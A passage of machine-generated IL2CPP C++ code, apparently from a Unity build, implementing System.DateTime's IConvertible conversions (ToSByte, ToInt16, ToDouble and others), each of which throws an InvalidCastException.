*)_stringLiteral9B30C1BF65712BDA061818365704D06F3871C202); String_t* L_3 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(_stringLiteralE5559C91F3F57F398B8B547CA356C67FFA1F6497, L_2, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_4 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, DateTime_System_IConvertible_ToSByte_m0577A0A1C226A26F0C92B65A7A3642E58C718078_RuntimeMethod_var); } } extern "C" int8_t DateTime_System_IConvertible_ToSByte_m0577A0A1C226A26F0C92B65A7A3642E58C718078_AdjustorThunk (RuntimeObject * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_System_IConvertible_ToSByte_m0577A0A1C226A26F0C92B65A7A3642E58C718078(_thisAdjusted, ___provider0, method); } // System.Byte System.DateTime::System.IConvertible.ToByte(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint8_t DateTime_System_IConvertible_ToByte_m5E09EBD1927AD26BC9589F68260366A3B926D01F (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_System_IConvertible_ToByte_m5E09EBD1927AD26BC9589F68260366A3B926D01F_MetadataUsageId); s_Il2CppMethodInitialized = true; } { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_0 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)2); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_1 = L_0; ArrayElementTypeCheck (L_1, _stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); (L_1)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)_stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_2 = L_1; ArrayElementTypeCheck (L_2, _stringLiteral7803EE252527503B67D1EEB0DEB252622746CEBD); (L_2)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (RuntimeObject *)_stringLiteral7803EE252527503B67D1EEB0DEB252622746CEBD); String_t* L_3 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(_stringLiteralE5559C91F3F57F398B8B547CA356C67FFA1F6497, L_2, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_4 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, DateTime_System_IConvertible_ToByte_m5E09EBD1927AD26BC9589F68260366A3B926D01F_RuntimeMethod_var); } } extern "C" uint8_t DateTime_System_IConvertible_ToByte_m5E09EBD1927AD26BC9589F68260366A3B926D01F_AdjustorThunk (RuntimeObject * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_System_IConvertible_ToByte_m5E09EBD1927AD26BC9589F68260366A3B926D01F(_thisAdjusted, ___provider0, method); } // System.Int16 System.DateTime::System.IConvertible.ToInt16(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int16_t DateTime_System_IConvertible_ToInt16_m93FA9B75E4EEAD2756A271E0E3C6FB041A98C75E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_System_IConvertible_ToInt16_m93FA9B75E4EEAD2756A271E0E3C6FB041A98C75E_MetadataUsageId); s_Il2CppMethodInitialized = true; } { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_0 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)2); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_1 = L_0; ArrayElementTypeCheck (L_1, _stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); (L_1)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)_stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_2 = L_1; ArrayElementTypeCheck (L_2, _stringLiteral7982E8C08D84551A97DDE8C3CC98E03FC2D6082C); (L_2)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (RuntimeObject *)_stringLiteral7982E8C08D84551A97DDE8C3CC98E03FC2D6082C); String_t* L_3 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(_stringLiteralE5559C91F3F57F398B8B547CA356C67FFA1F6497, L_2, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_4 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, DateTime_System_IConvertible_ToInt16_m93FA9B75E4EEAD2756A271E0E3C6FB041A98C75E_RuntimeMethod_var); } } extern "C" int16_t DateTime_System_IConvertible_ToInt16_m93FA9B75E4EEAD2756A271E0E3C6FB041A98C75E_AdjustorThunk (RuntimeObject * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_System_IConvertible_ToInt16_m93FA9B75E4EEAD2756A271E0E3C6FB041A98C75E(_thisAdjusted, ___provider0, method); } // System.UInt16 System.DateTime::System.IConvertible.ToUInt16(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint16_t DateTime_System_IConvertible_ToUInt16_m86FFF72766A8C70F9099DEE61111D3E0B9FC618D (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_System_IConvertible_ToUInt16_m86FFF72766A8C70F9099DEE61111D3E0B9FC618D_MetadataUsageId); s_Il2CppMethodInitialized = true; } { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_0 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)2); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_1 = L_0; ArrayElementTypeCheck (L_1, _stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); (L_1)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)_stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_2 = L_1; ArrayElementTypeCheck (L_2, _stringLiteral70B4BB2684C3F8969E2FE9E14B470906FD4CF3C6); (L_2)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (RuntimeObject *)_stringLiteral70B4BB2684C3F8969E2FE9E14B470906FD4CF3C6); String_t* L_3 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(_stringLiteralE5559C91F3F57F398B8B547CA356C67FFA1F6497, L_2, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_4 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, DateTime_System_IConvertible_ToUInt16_m86FFF72766A8C70F9099DEE61111D3E0B9FC618D_RuntimeMethod_var); } } extern "C" uint16_t DateTime_System_IConvertible_ToUInt16_m86FFF72766A8C70F9099DEE61111D3E0B9FC618D_AdjustorThunk (RuntimeObject * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_System_IConvertible_ToUInt16_m86FFF72766A8C70F9099DEE61111D3E0B9FC618D(_thisAdjusted, ___provider0, method); } // System.Int32 System.DateTime::System.IConvertible.ToInt32(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int32_t DateTime_System_IConvertible_ToInt32_m494AB8F54DE9983726AD984DAB9AC41F9BE3EDDF (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_System_IConvertible_ToInt32_m494AB8F54DE9983726AD984DAB9AC41F9BE3EDDF_MetadataUsageId); s_Il2CppMethodInitialized = true; } { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_0 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)2); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_1 = L_0; ArrayElementTypeCheck (L_1, _stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); (L_1)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)_stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_2 = L_1; ArrayElementTypeCheck (L_2, _stringLiteralF4753A4DEE54EE10A75B28C6D04EB9EA0D19ACCE); (L_2)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (RuntimeObject *)_stringLiteralF4753A4DEE54EE10A75B28C6D04EB9EA0D19ACCE); String_t* L_3 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(_stringLiteralE5559C91F3F57F398B8B547CA356C67FFA1F6497, L_2, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_4 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, DateTime_System_IConvertible_ToInt32_m494AB8F54DE9983726AD984DAB9AC41F9BE3EDDF_RuntimeMethod_var); } } extern "C" int32_t DateTime_System_IConvertible_ToInt32_m494AB8F54DE9983726AD984DAB9AC41F9BE3EDDF_AdjustorThunk (RuntimeObject * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_System_IConvertible_ToInt32_m494AB8F54DE9983726AD984DAB9AC41F9BE3EDDF(_thisAdjusted, ___provider0, method); } // System.UInt32 System.DateTime::System.IConvertible.ToUInt32(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint32_t DateTime_System_IConvertible_ToUInt32_mBC2307EA9BC8BDD1CA4D83FF93036F6361D3390B (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_System_IConvertible_ToUInt32_mBC2307EA9BC8BDD1CA4D83FF93036F6361D3390B_MetadataUsageId); s_Il2CppMethodInitialized = true; } { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_0 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)2); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_1 = L_0; ArrayElementTypeCheck (L_1, _stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); (L_1)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)_stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_2 = L_1; ArrayElementTypeCheck (L_2, _stringLiteralE71E7BC3FE9E9F3C39E46B53FFFF0C83D9CC9A36); (L_2)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (RuntimeObject *)_stringLiteralE71E7BC3FE9E9F3C39E46B53FFFF0C83D9CC9A36); String_t* L_3 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(_stringLiteralE5559C91F3F57F398B8B547CA356C67FFA1F6497, L_2, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_4 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, DateTime_System_IConvertible_ToUInt32_mBC2307EA9BC8BDD1CA4D83FF93036F6361D3390B_RuntimeMethod_var); } } extern "C" uint32_t DateTime_System_IConvertible_ToUInt32_mBC2307EA9BC8BDD1CA4D83FF93036F6361D3390B_AdjustorThunk (RuntimeObject * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_System_IConvertible_ToUInt32_mBC2307EA9BC8BDD1CA4D83FF93036F6361D3390B(_thisAdjusted, ___provider0, method); } // System.Int64 System.DateTime::System.IConvertible.ToInt64(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR int64_t DateTime_System_IConvertible_ToInt64_m37AB85D1F73721D2C30274B8008564637435E03B (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_System_IConvertible_ToInt64_m37AB85D1F73721D2C30274B8008564637435E03B_MetadataUsageId); s_Il2CppMethodInitialized = true; } { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_0 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)2); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_1 = L_0; ArrayElementTypeCheck (L_1, _stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); (L_1)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)_stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_2 = L_1; ArrayElementTypeCheck (L_2, _stringLiteral180FCBE698D0F2C44101A06215C472930BBD0A01); (L_2)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (RuntimeObject *)_stringLiteral180FCBE698D0F2C44101A06215C472930BBD0A01); String_t* L_3 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(_stringLiteralE5559C91F3F57F398B8B547CA356C67FFA1F6497, L_2, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_4 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, DateTime_System_IConvertible_ToInt64_m37AB85D1F73721D2C30274B8008564637435E03B_RuntimeMethod_var); } } extern "C" int64_t DateTime_System_IConvertible_ToInt64_m37AB85D1F73721D2C30274B8008564637435E03B_AdjustorThunk (RuntimeObject * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_System_IConvertible_ToInt64_m37AB85D1F73721D2C30274B8008564637435E03B(_thisAdjusted, ___provider0, method); } // System.UInt64 System.DateTime::System.IConvertible.ToUInt64(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR uint64_t DateTime_System_IConvertible_ToUInt64_mD79A0DAD19E8DA50E102E48A793FD0BA9F0DC34E (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_System_IConvertible_ToUInt64_mD79A0DAD19E8DA50E102E48A793FD0BA9F0DC34E_MetadataUsageId); s_Il2CppMethodInitialized = true; } { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_0 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)2); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_1 = L_0; ArrayElementTypeCheck (L_1, _stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); (L_1)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)_stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_2 = L_1; ArrayElementTypeCheck (L_2, _stringLiteral69A99906F5A06EA1BDBFC02E6132D35DE781D3F1); (L_2)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (RuntimeObject *)_stringLiteral69A99906F5A06EA1BDBFC02E6132D35DE781D3F1); String_t* L_3 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(_stringLiteralE5559C91F3F57F398B8B547CA356C67FFA1F6497, L_2, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_4 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, DateTime_System_IConvertible_ToUInt64_mD79A0DAD19E8DA50E102E48A793FD0BA9F0DC34E_RuntimeMethod_var); } } extern "C" uint64_t DateTime_System_IConvertible_ToUInt64_mD79A0DAD19E8DA50E102E48A793FD0BA9F0DC34E_AdjustorThunk (RuntimeObject * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_System_IConvertible_ToUInt64_mD79A0DAD19E8DA50E102E48A793FD0BA9F0DC34E(_thisAdjusted, ___provider0, method); } // System.Single System.DateTime::System.IConvertible.ToSingle(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR float DateTime_System_IConvertible_ToSingle_m5AA2E27FE6580FA36530B9475A80DF43BFEF8B90 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_System_IConvertible_ToSingle_m5AA2E27FE6580FA36530B9475A80DF43BFEF8B90_MetadataUsageId); s_Il2CppMethodInitialized = true; } { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_0 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)2); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_1 = L_0; ArrayElementTypeCheck (L_1, _stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); (L_1)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)_stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_2 = L_1; ArrayElementTypeCheck (L_2, _stringLiteralDD1186892A2F5C2BD17CD7D41F90482E39BD02C5); (L_2)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (RuntimeObject *)_stringLiteralDD1186892A2F5C2BD17CD7D41F90482E39BD02C5); String_t* L_3 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(_stringLiteralE5559C91F3F57F398B8B547CA356C67FFA1F6497, L_2, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_4 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, DateTime_System_IConvertible_ToSingle_m5AA2E27FE6580FA36530B9475A80DF43BFEF8B90_RuntimeMethod_var); } } extern "C" float DateTime_System_IConvertible_ToSingle_m5AA2E27FE6580FA36530B9475A80DF43BFEF8B90_AdjustorThunk (RuntimeObject * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_System_IConvertible_ToSingle_m5AA2E27FE6580FA36530B9475A80DF43BFEF8B90(_thisAdjusted, ___provider0, method); } // System.Double System.DateTime::System.IConvertible.ToDouble(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR double DateTime_System_IConvertible_ToDouble_m4E342FDC428CF2B3F3E634A2C583DE8350BC7075 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_System_IConvertible_ToDouble_m4E342FDC428CF2B3F3E634A2C583DE8350BC7075_MetadataUsageId); s_Il2CppMethodInitialized = true; } { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_0 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)2); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_1 = L_0; ArrayElementTypeCheck (L_1, _stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); (L_1)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(0), (RuntimeObject *)_stringLiteralF1E5BAF5ECC3589631088C40CBDD43061976ED8F); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_2 = L_1; ArrayElementTypeCheck (L_2, _stringLiteral81581597044514BF54D4F97266022FC991F3915E); (L_2)->SetAtUnchecked(static_cast<il2cpp_array_size_t>(1), (RuntimeObject *)_stringLiteral81581597044514BF54D4F97266022FC991F3915E); String_t* L_3 = Environment_GetResourceString_m7389941B4C0688D875CC647D99A739DA2F907ADB(_stringLiteralE5559C91F3F57F398B8B547CA356C67FFA1F6497, L_2, /*hidden argument*/NULL); InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA * L_4 = (InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA *)il2cpp_codegen_object_new(InvalidCastException_t91DF9E7D7FCCDA6C562CB4A9A18903E016680FDA_il2cpp_TypeInfo_var); InvalidCastException__ctor_m3795145150387C6C362DA693613505C604AB8812(L_4, L_3, /*hidden argument*/NULL); IL2CPP_RAISE_MANAGED_EXCEPTION(L_4, NULL, DateTime_System_IConvertible_ToDouble_m4E342FDC428CF2B3F3E634A2C583DE8350BC7075_RuntimeMethod_var); } } extern "C" double DateTime_System_IConvertible_ToDouble_m4E342FDC428CF2B3F3E634A2C583DE8350BC7075_AdjustorThunk (RuntimeObject * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * _thisAdjusted = reinterpret_cast<DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 *>(__this + 1); return DateTime_System_IConvertible_ToDouble_m4E342FDC428CF2B3F3E634A2C583DE8350BC7075(_thisAdjusted, ___provider0, method); } // System.Decimal System.DateTime::System.IConvertible.ToDecimal(System.IFormatProvider) extern "C" IL2CPP_METHOD_ATTR Decimal_t44EE9DA309A1BF848308DE4DDFC070CAE6D95EE8 DateTime_System_IConvertible_ToDecimal_mB7DCD14BFB253B7CD70733AA9E58FA2824D508F3 (DateTime_t349B7449FBAAFF4192636E2B7A07694DA9236132 * __this, RuntimeObject* ___provider0, const RuntimeMethod* method) { static bool s_Il2CppMethodInitialized; if (!s_Il2CppMethodInitialized) { il2cpp_codegen_initialize_method (DateTime_System_IConvertible_ToDecimal_mB7DCD14BFB253B7CD70733AA9E58FA2824D508F3_MetadataUsageId); s_Il2CppMethodInitialized = true; } { ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_0 = (ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A*)SZArrayNew(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A_il2cpp_TypeInfo_var, (uint32_t)2); ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* L_1 = 